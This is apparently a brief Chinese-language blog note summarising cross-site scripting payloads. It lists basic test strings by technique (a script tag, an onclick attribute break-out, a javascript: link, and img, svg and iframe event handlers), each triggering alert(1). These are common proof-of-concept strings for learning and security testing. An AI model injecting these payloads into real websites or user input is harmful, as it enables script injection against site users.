xss笔记总结

普通注入

<script>alert(1)</script> 

点击注入

"οnclick="alert(1)

创建链接

<a href="javascript:alert(1)">123</a>

点击创建输入框

<input onclick="alert(1)">

插入图片

<img src="123" onerror="alert(1)">
< img src=1 onmouseover="alert(1)"> 

其他

<svg onload="alert(1)">    
<iframe src="http://www.baidu.com" onload="alert(1)"></iframe>

你可能感兴趣的:(xss)